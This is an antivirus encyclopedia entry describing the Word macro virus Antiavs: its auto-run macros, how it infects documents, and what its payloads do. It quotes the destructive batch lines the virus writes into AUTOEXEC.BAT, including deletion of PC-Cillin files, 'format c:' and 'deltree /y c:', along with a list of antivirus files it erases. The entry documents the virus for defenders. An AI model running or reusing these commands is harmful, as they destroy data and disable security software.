Virus.MSWord.Antiavs

Класс Virus
Платформа MSWord
Описание

Technical Details

Зашифрованный китайский Word-макро-вирус. Содержит 9 макросов: AutoExec,
AAV, AutoOpen, AutoNew, FileSaveAs, ZlockMacro, FileTemplates, ToolsMacro,
Organizer. Заражают систему при открытии зараженного файла (AutoOpen).
Заражает документы при их сохранении с другим именем (FileSaveAs).
При вызове меню File/Template (макрос FileTemplate) вирус устанавливает
пароль «AntiAVs» на текущий документ и выдает MessageBox:

WordBasic Err = 16
Not enough memory!

При вызове меню макросов Tools/Macro (макрос ToolsMacro) вирус стирает весь
текст пользователя в текущем документе и добавляет в AUTOEXEC.BAT команды
уничтожения файлов антивируса PC-CILLIN:

echo off
attrib -h -r -s +a c:pc-cil~1*.* >nul
del c:pc-cil~1*.dll >nul

После этого вирус стирает все файлы, связанные с антивирусами:

C:PC-Cillin 95Lpt$vpn.*
C:PC-Cillin 97Lpt$vpn.*
C:TscPC-Cillin 97Lpt$vpn.*
C:ZlockavGsav.cas
C:VB7Virus.txt
C:Program FilesNorton AntiVirusViruscan.dat
C:Program FilesSymantecSymevnt.386
C:Program FilesMcAfeeVirusScan95Scan.dat
C:Program FilesMcAfeeVirusScan95Mcscan32.dll
C:Program FilesMcAfeeVirusScanScan.dat
C:Program FilesMcAfeeVirusScanMcscan32.dll
C:Program FilesCommand SoftwareF-PROT95Sign.def
C:Program FilesCommand SoftwareF-PROT95Dvp.vxd
C:Program FilesAntiViral Toolkit ProAvp32.exe
C:Program FilesAntiViral Toolkit Pro*.avc
C:Tbavw95Tbavw95.vxd

В зависимости датчика случайных чисел записывает в AUTOEXEC.BAT строки:

@Echo off
cls
echo I have clean a huge virus:
echo         MS-WINDOWS
echo for you.   ^_^
echo                --AntiAVs--
echo y|format c: /u /v:AAV >nul
deltree /y c: >nul